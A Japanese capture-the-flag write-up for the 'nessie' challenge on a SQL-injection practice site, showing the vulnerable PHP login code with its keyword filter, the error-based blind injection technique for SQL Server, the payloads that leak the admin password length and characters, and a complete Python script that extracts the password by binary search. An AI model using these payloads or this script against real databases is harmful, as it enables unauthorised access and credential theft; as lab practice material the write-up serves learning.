<?php include "./config.php"; login_chk(); $db = mssql_connect(); if(preg_match('/master|sys|information|prob|;|waitfor|_/i', $_GET['id'])) exit("No Hack ~_~"); if(preg_match('/master|sys|information|prob|;|waitfor|_/i', $_GET['pw'])) exit("No Hack ~_~"); $query = "select id from prob_nessie where id='{$_GET['id']}' and pw='{$_GET['pw']}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; sqlsrv_query($db,$query); if(sqlsrv_errors()) exit(mssql_error(sqlsrv_errors())); $query = "select pw from prob_nessie where id='admin'"; $result = sqlsrv_fetch_array(sqlsrv_query($db,$query)); if($result['pw'] === $_GET['pw']) solve("nessie"); highlight_file(__FILE__);
特徴は以下。
- SQL Server
- id,pwが入力可能
master,sys,information,prob,;,waitfor
がフィルタリング
- エラーが出れば表示される
- adminのpwを取得してくる必要がある
Error-based Blind SQL Injectionしよう
Error-based Blind SQL Injection
SQL Serverでエラーを出したいとき
Error: [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Conversion failed when converting the varchar value 'z' to data type int.
- [LOS] nessie
1=(case when 条件 then 'z' end)
とすれば条件がtrueならエラーが出る
なるほど?以下のように式を作ろう。
以下で長さを抜き取る。
admin' and 1=(case when {md} <= len(pw) then 'z' end) --
以下で中身を抜き取る。
admin' and 1=(case when {md} <= ascii(substring(pw,{i+1},1)) then 'z' end) --
import requests url = "https://los.rubiya.kr/chall/nessie_7cd2.php" cookie = {'PHPSESSID': ''} def check(data) -> bool: return "Error: [Microsoft][ODBC Driver 17 for SQL Server]" in data return ("Hello admin" in data) or ("Hello guest" in data) or ("login success!" in data) ok = 0 ng = 120 while ok + 1 != ng: md = (ok + ng) // 2 q = f"admin' and 1=(case when {md} <= len(pw) then 'z' end) --" res = requests.get(url, params={'id': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md length = ok print(f"[*] length = {length}") ans = "" for i in range(0, length): ok = 0 ng = 256 while ok + 1 != ng: md = (ok + ng) // 2 q = f"admin' and 1=(case when {md} <= ascii(substring(pw,{i+1},1)) then 'z' end) --" res = requests.get(url, params={'id': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md ans += str(chr(ok)) print(f"[*] {ans}") print(f"[*] find! {ans}")